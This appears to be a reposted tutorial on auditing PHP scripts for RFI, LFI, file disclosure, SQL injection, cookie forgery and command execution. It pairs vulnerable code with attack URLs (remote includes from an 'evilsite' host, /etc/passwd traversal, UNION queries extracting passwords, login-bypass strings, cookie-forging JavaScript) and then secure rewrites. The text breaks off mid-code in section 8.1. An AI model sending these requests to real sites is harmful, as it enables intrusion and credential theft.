Finding vulnerabilities in PHP scripts FULL ( with examples )

Name : Finding vulnerabilities in PHP scripts FULL ( with examples )
Author : SirGod
Email : sirgod08@gmail.com
Contents :

1) About
2) Some stuff
3) Remote File Inclusion
3.0 – Basic example
3.1 – Simple example
3.2 – How to fix
4) Local File Inclusion
4.0 – Basic example
4.1 – Simple example
4.2 – How to fix
5) Local File Disclosure/Download
5.0 – Basic example
5.1 – Simple example
5.2 – How to fix
6) SQL Injection
6.0 – Basic example
6.1 – Simple example
6.2 – SQL Login Bypass
6.3 – How to fix
7) Insecure Cookie Handling
7.0 – Basic example
7.1 – Simple example
7.2 – How to fix
8) Remote Command Execution
8.0 – Basic example
8.1 – Simple example
8.2 – Advanced example
8.3 – How to fix
9) Remote Code Execution
9.0 – Basic example
9.1 – Simple example
9.2 – How to fix
10) Cross-Site Scripting
10.0 – Basic example
10.1 – Another example
10.2 – Simple example
10.3 – How to fix
11) Authentication Bypass
11.0 – Basic example
11.1 – Via login variable
11.2 – Unprotected Admin CP
11.3 – How to fix
12) Insecure Permissions
12.0 – Basic example
12.1 – Read the users/passwords
12.2 – Download backups
12.3 – INC files
12.4 – How to fix
13) Cross Site Request Forgery
13.0 – Basic example
13.1 – Simple example
13.2 – How to fix
14) Shoutz

1) In this tutorial I will show you how you can find vulnerabilities in PHP scripts. I will not explain
how to exploit the vulnerabilities; it is pretty easy and you can find info around the web. All the
examples, except the basic example of each category, were found in different real scripts.

2) First, install Apache, PHP and MySQL on your computer. Additionally you can install phpMyAdmin.
You can install WAMP server for example; it has all in one. Most vulnerabilities need special conditions
to work, so you will need to set up the PHP configuration file (php.ini) properly. I will show you what
configuration I use and why :

safe_mode = off ( a lot of shit cannot be done with this on )
disable_functions = ( none, we want all )
register_globals = on ( we can set variables by request )
allow_url_include = on ( for lfi/rfi )
allow_url_fopen = on ( for lfi/rfi )
magic_quotes_gpc = off ( when on, this escapes ' " \ and NUL with a backslash and we don't want that )
short_open_tag = on ( some scripts are using short tags, better on )
file_uploads = on ( we want to upload )
display_errors = on ( we want to see the script errors, maybe some undeclared variables? )

How to proceed : First, create a database to be used by the different scripts. Install the script on
localhost and start the audit over the source code. If you find something, open the web browser and
test it; maybe you are wrong.

3) Remote File Inclusion

– Tips : You can use the NULLBYTE and ? trick.
You can use HTTPS and FTP to bypass filters ( when only "http" is filtered ).

PHP has four functions through which you can include code :

require – require() is identical to include() except that upon failure it produces a fatal E_ERROR level error.
require_once – identical to require() except that PHP checks whether the file has already been included, and if so, does not include (require) it again.
include – includes and evaluates the specified file.
include_once – includes and evaluates the specified file during the execution of the script; if the file has already been included, it is not included again.

3.0 – Basic example

– Tips : some scripts don't accept "http" in variables; the "http" word is forbidden, so
you can use "https" or "ftp".

– Code snippet from test.php

———————————————–

———————————————–

– If we access the page we get some errors and some warnings ( not all pasted ) :

Notice: Undefined index: pagina in C:\wamp\www\test.php on line 2

– We can see here that the "pagina" variable is undefined, so we can set any value to the "pagina" variable. Example :

http://127.0.0.1/test.php?pagina=http://evilsite.com/evilscript.txt

Now I will show why some people use ? and %00 after the link to the evil script.

# The “%00”

– Code snippet from test.php

———————————————–

———————————————–

– So if we request

http://127.0.0.1/test.php?pagina=http://evilsite.com/evilscript.txt

it will not work, because the script will try to include http://evilsite.com/evilscript.txt.php

So we add a NULLBYTE ( %00 ) and everything after the nullbyte will not be taken into
consideration. Example :

http://127.0.0.1/test.php?pagina=http://evilsite.com/evilscript.txt%00

The script will successfully include our evilscript and will throw away the things
after the nullbyte.

# The “?”

– Code snippet from test.php

———————————————–

———————————————–

and the logged=1 will be treated like a query-string variable of the remote file. But better use the nullbyte. Example :

http://127.0.0.1/test.php?pagina=http://evilsite.com/evilscript.txt?logged=1

The evilscript will be included successfully.

3.1 – Simple example

Now an example from a script.

– Code snippet from index.php

—————————————————-
if (isset($_REQUEST["main_content"])){
    $main_content = $_REQUEST["main_content"];
} else if (isset($_SESSION["main_content"])){
    $main_content = $_SESSION["main_content"];
}
…………………..etc………………
ob_start();
require_once($main_content);
—————————————————-

We can see that the "main_content" variable is taken from $_REQUEST. The attacker can
set any value he wants. Below, the "main_content" variable is included. So if we make the
following request :

http://127.0.0.1/index.php?main_content=http://evilsite.com/evilscript.txt

our evil script will be successfully included.

3.2 – How to fix

Simple way : Don't allow special chars in variables; for example, filter the slash "/" .
Another way : filter "http" , "https" , "ftp" and "smb".

4) Local File Inclusion

– Tips : You can use the NULLBYTE and ? trick.
../ means one directory up.
On Windows systems we can use "..\" instead of "../" . The "..\" will become "..%5C" ( urlencoded ).

The same functions that let you include ( include, include_once, require, require_once ) are affected.

4.0 – Basic example

– Code snippet from test.php

———————————–

———————————–

Now we cannot include our remote script, because the script can only include local files,
as you see. So if we make the following request :

http://127.0.0.1/test.php?pagina=../../../../../../etc/passwd

the script will include "/pages/../../../../../../etc/passwd" successfully.

You can use the %00 and ? tricks here too. The same story.

4.1 – Simple example

– Code snippet from install/install.php

————————————-
if(empty($_GET["url"]))
    $url = 'step_welcome.php';
else
    $url = $_GET["url"];
………….etc………….

————————————-

We can see that the "url" variable is injectable. If the "url" variable is not set
( is empty ) the script will include "step_welcome.php", else it will include the
value set by the attacker.

So if we do the following request :

http://127.0.0.1/install/install.php?url=../../../../../../etc/passwd

The "etc/passwd" file will be successfully included.

4.2 – How to fix

Simple way : Don't allow special chars in variables; for example, filter the dot "." .
Another way : Filter "/" , "\" and "." .
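Filtering characters out of the variable is fragile. The sturdier fix for both the RFI in 3.1 and the LFI in 4.1 is to never pass request data to include/require at all, and instead map the request to a fixed allow-list. The following is an added example, not code from the tutorial or from the audited scripts; the page keys and file paths are assumptions. Note also that allow_url_include has defaulted to Off since PHP 5.2 (deprecated in 7.4) and that PHP rejects paths containing a NUL byte since 5.3.4, so the tricks above only work on deliberately weakened or very old installs.

```php
<?php
// Added example: allow-list based page loading, replacing require_once($main_content)
// from 3.1 and the $_GET["url"] include from 4.1.
// PAGES keys and file paths are assumptions for the demo.

const PAGES = [
    'home'    => 'pages/home.php',
    'contact' => 'pages/contact.php',
    'welcome' => 'install/step_welcome.php',
];

// Resolve a user-supplied page key to a file path, or null if it is not allowed.
function resolve_page(?string $key): ?string
{
    if ($key === null || $key === '') {
        $key = 'home'; // default page, like the 'step_welcome.php' fallback in 4.1
    }
    // Only known keys are accepted, so "../", "http://", "%00" and friends
    // never reach include(): the request data selects a path, it never is one.
    return PAGES[$key] ?? null;
}

$page = resolve_page(isset($_GET['page']) ? (string)$_GET['page'] : null);
if ($page === null) {
    http_response_code(404);
    exit('Unknown page');
}
require_once __DIR__ . '/' . $page;
```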

5) Local File Disclosure/Download

– Tips : Through this vulnerability you can read the content of files, not include them.

Some functions that let you read files :

file_get_contents — Reads entire file into a string
readfile — Outputs a file
file — Reads entire file into an array
fopen — Opens file or URL
highlight_file — Syntax highlighting of a file.Prints out or returns a syntax
highlighted version of the code contained in filename using the
colors defined in the built-in syntax highlighter for PHP.
show_source — Alias of highlight_file()

5.0 – Basic example

– Code snippet from test.php

————————————–

————————————–

The readfile() function reads the content of the specified file and outputs it. So if we do the following request :

http://127.0.0.1/test.php?pagina=../../../../../../etc/passwd

the content of etc/passwd will be output, NOT included.

5.1 – Simple example

– Code snippet from download.php

———————————————————————————–
$file = $_SERVER["DOCUMENT_ROOT"] . $_REQUEST['file'];
header("Pragma: public");
header("Expires: 0");
header("Cache-Control: must-revalidate, post-check=0, pre-check=0");

header("Content-Type: application/force-download");
header("Content-Disposition: attachment; filename=" . basename($file));

//header("Content-Description: File Transfer");
@readfile($file);
die();
———————————————————————————–

The "file" variable is insecure. We see in the first line that it is taken from $_REQUEST,
and the file is disclosed by the readfile() function. So we can see the content of an arbitrary file.
If we make the following request :

http://127.0.0.1/download.php?file=../../../../../../etc/passwd

we successfully read the "etc/passwd" file.

5.2 – How to fix

Simple way : Don't allow special chars in variables; for example, filter the dot "." .
Another way : Filter "/" , "\" and "." .
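For a download script like the one in 5.1, where the file name genuinely comes from the user, the check that actually holds is to canonicalise the path with realpath() and require that it stays inside one dedicated directory. This is an added example, not the tutorial's code; DOWNLOAD_DIR is an assumption.

```php
<?php
// Added example: a safe replacement for download.php (5.1).
// The requested name is reduced to a bare file name, resolved with realpath(),
// and only served if the resolved path is inside DOWNLOAD_DIR. "../",
// absolute paths and symlinks pointing outside the directory are all rejected.
const DOWNLOAD_DIR = __DIR__ . '/downloads'; // assumption for the demo

// Return the absolute path of an allowed file, or null if the request is invalid.
function safe_download_path(string $requested): ?string
{
    $base = realpath(DOWNLOAD_DIR);
    if ($base === false) {
        return null; // download directory missing
    }
    // basename() drops any directory part the client sent ("../../etc/passwd" -> "passwd").
    $name = basename($requested);
    if ($name === '' || $name === '.' || $name === '..') {
        return null;
    }
    $path = realpath($base . DIRECTORY_SEPARATOR . $name);
    // realpath() is false for missing files; the prefix check catches a symlink
    // inside the directory that resolves to somewhere outside it.
    if ($path === false || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return is_file($path) ? $path : null;
}

$path = safe_download_path(isset($_GET['file']) ? (string)$_GET['file'] : '');
if ($path === null) {
    http_response_code(404);
    exit('File not found');
}
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . basename($path) . '"');
header('Content-Length: ' . filesize($path));
readfile($path);
exit;
```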

6) SQL Injection

– Tips : If the database user has FILE privileges you can read files.
If the user has FILE privileges, you find a writable directory and magic_quotes_gpc = off,
you can write your code into a file.

6.0 – Basic example

– Code snippet from test.php

———————————————————————————-

———————————————————————————-

The "id" variable is not filtered. We can inject our SQL code through the "id" variable. Example :

http://127.0.0.1/test.php?id=1+union+all+select+1,null,load_file('etc/passwd'),4--

And we get the "etc/passwd" file if magic_quotes_gpc = off ( it would escape the ' ) and the database user has
FILE privileges.

6.1 – Simple example

– Code snippet from house/listing_view.php

—————————————————————————————————————————–
$id = $_GET['itemnr'];
require_once($home . "mysqlinfo.php");
$query = "SELECT title, type, price, bedrooms, distance, address, phone, comments, handle, image from Rentals where id=$id";
$result = mysql_query($query);
if(mysql_num_rows($result)){
    $r = mysql_fetch_array($result);
—————————————————————————————————————————–

We see that the "id" variable takes the value of "itemnr" and is not filtered in any way.
So we can inject our code. Let's make a request :

http://127.0.0.1/house/listing_view.php?itemnr=null+union+all+select+1,2,3,concat(0x3a,email,password),5,6,7,8,9,10+from+users--

And we get the email and the password from the users table.

6.2 – SQL Injection Login Bypass

– Code snippet from /admin/login.php

——————————————————————————————————————————
$postbruger = $_POST['username'];
$postpass = md5($_POST['password']);
$resultat = mysql_query("SELECT * FROM " . $tablestart . "login WHERE brugernavn = '$postbruger' AND password = '$postpass'")
or die("" . mysql_error() . "\n");
——————————————————————————————————————————

The variables aren't properly checked, so we can bypass this login. Let's inject the following username and password :

username : admin ' or ' 1=1
password : sirgod

We are logged in. Why? Look, the query will become

———————————————————————————————————————————
$resultat = mysql_query("SELECT * FROM " . $tablestart . "login WHERE brugernavn = 'admin' ' or ' 1=1 AND password = 'sirgod'")
———————————————————————————————————————————

Login bypassed. The username must be an existing username.

6.3 – How to fix

Simple way : Don't allow special chars in variables. For numeric variables
use an (int) cast, example : $id = (int)$_GET['id'];
Another way : For non-numeric variables, filter all special chars used in
SQLi : - , . ( ) ' " _ + / *
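Casting to (int) is fine for numeric ids, but the general fix for 6.1 and 6.2 is to keep user data out of the SQL text entirely with parameterised queries. This added example (not the tutorial's or the audited scripts' code) rewrites listing_view.php and admin/login.php on PDO; the mysql_* functions used above were removed in PHP 7. The DSN, credentials and the `login` table without the $tablestart prefix are assumptions.

```php
<?php
// Added example: parameterised versions of listing_view.php (6.1) and admin/login.php (6.2).
// Connection details are assumptions for the demo.
$pdo = new PDO('mysql:host=127.0.0.1;dbname=app;charset=utf8mb4', 'user', 'pass', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false, // real server-side prepared statements
]);

// 6.1: the id is validated as a positive integer and bound as a parameter, so
// "null union all select ..." is rejected before any SQL is built.
function rental_by_id(PDO $pdo, string $raw): ?array
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }
    $stmt = $pdo->prepare(
        'SELECT title, type, price, bedrooms, distance, address, phone, comments, handle, image
           FROM Rentals WHERE id = :id'
    );
    $stmt->execute([':id' => $id]);
    return $stmt->fetch(PDO::FETCH_ASSOC) ?: null;
}

// 6.2: the username is a bound parameter and the password is checked with
// password_verify() against a stored password_hash() value, instead of
// comparing an md5 inside the WHERE clause. A username like "admin ' or ' 1=1"
// is just a string that matches no row.
function login(PDO $pdo, string $user, string $pass): bool
{
    $stmt = $pdo->prepare('SELECT password FROM login WHERE brugernavn = :u');
    $stmt->execute([':u' => $user]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    // Verify against a dummy hash when the user is unknown, so response time
    // does not reveal whether the username exists.
    $hash = $row['password'] ?? password_hash('dummy', PASSWORD_DEFAULT);
    return $row !== false && password_verify($pass, $hash);
}
```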

7) Insecure Cookie Handling

– Tips : Write the code in the URL bar; you don't need a cookie editor for this.

7.0 – Basic example

– Code snippet from test.php

—————————————————————
if($_POST['password'] == $thepass) {
    setcookie("is_user_logged", "1");
} else { die("Login failed!"); }
………… etc ……………..
if($_COOKIE['is_user_logged'] == "1")
{ include "admin.php"; } else { die('not logged'); }
—————————————————————

Something interesting here. If we set the "is_user_logged" cookie
to the value "1" we are logged in. Example :

javascript:document.cookie = "is_user_logged=1; path=/";

So practically we are logged in: we pass the check and we can access the admin panel.

7.1 – Simple example

– Code snippet from admin.php

—————————————————————-
if ($_COOKIE['PHPMYBCAdmin'] == '') {
    if (!$_POST['login'] == 'login') {
        die("Please Login: ");
    } elseif($_POST['password'] == $bcadminpass) {
        setcookie("PHPMYBCAdmin", "LOGGEDIN", time() + 60 * 60);
        header("Location: admin.php"); } else { die("Incorrect"); }
}
—————————————————————-

The code looks exploitable. We can set a cookie value that lets us bypass the login
and tells the script that we are already logged in. Example :

javascript:document.cookie = "PHPMYBCAdmin=LOGGEDIN; path=/";document.cookie = "1246371700; path=/";

What is 1246371700? It is the current time() echoed + 360.

7.2 – How to fix

Simple way : The most simple and efficient way : use SESSIONS .
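The reason sessions fix 7.0 and 7.1 is that the "logged in" state moves to the server; the browser only holds an opaque session id, so forging document.cookie values does nothing. Below is an added example (not the tutorial's code) of the 7.0 login rebuilt on $_SESSION, with the cookie flags and session-id regeneration a practitioner would add; ADMIN_HASH is a labelled placeholder to be replaced by real password_hash() output, and the array form of session_set_cookie_params() needs PHP 7.3 or later.

```php
<?php
// Added example: the login from 7.0 on server-side sessions.
// ADMIN_HASH is a placeholder; store the output of password_hash() here.
const ADMIN_HASH = '$2y$10$PLACEHOLDER_replace_with_password_hash_output';

// Session cookie: unreadable from JavaScript, HTTPS only, not sent cross-site.
session_set_cookie_params([
    'httponly' => true,
    'secure'   => true,
    'samesite' => 'Strict',
]);
session_start();

// Check the password and, on success, mark this session as logged in.
function attempt_login(string $password): bool
{
    if (!password_verify($password, ADMIN_HASH)) {
        return false;
    }
    // A fresh session id on privilege change defeats session fixation.
    session_regenerate_id(true);
    $_SESSION['is_user_logged'] = true;
    $_SESSION['login_time']     = time();
    return true;
}

// The flag is read from $_SESSION, never from $_COOKIE.
function is_logged_in(): bool
{
    return ($_SESSION['is_user_logged'] ?? false) === true;
}

if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['password'])) {
    if (!attempt_login((string)$_POST['password'])) {
        http_response_code(401);
        exit('Login failed!');
    }
}

if (!is_logged_in()) {
    exit('not logged');
}
require __DIR__ . '/admin.php';
```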

8) Remote Command Execution

– Tips : If the script uses exec() you can't see the command output ( but the command is executed )
unless the result is echoed by the script.
You can chain with the || operator if the script executes more than one command.

PHP has some functions that let you execute commands :

exec — Execute an external program
passthru — Execute an external program and display raw output
shell_exec — Execute command via shell and return the complete output as a string
system — Execute an external program and display the output

8.0 – Basic example

– Code snippet from test.php

———————————

———————————

So if we make the following request :

http://127.0.0.1/test.php?cmd=whoami

The command will be executed and the result will be output.

8.1 – Simple example

– Code snippet from dig.php

——————————————————————————————-
$status = $_GET['status'];
$ns = $_GET['ns'];
$host = $_GET['host'];
$query_type = $_GET['query_type']; // ANY, MX, A, etc.
$ip = $_SERVER['REMOTE_ADDR'];
$self = $_SERVER['PHP_SELF'];
…………………… etc ……………………
$host = trim($host);
$host = strtolower($host);
echo("Executing : dig @$ns $host $query_type ");
echo '

~ by gipsylinux on October 3, 2009.

One Response to "Finding vulnerabilities in PHP scripts FULL ( with examples )"

  1. thanks this is a very useful info for me,
    i think nulled scripts are easy to hack
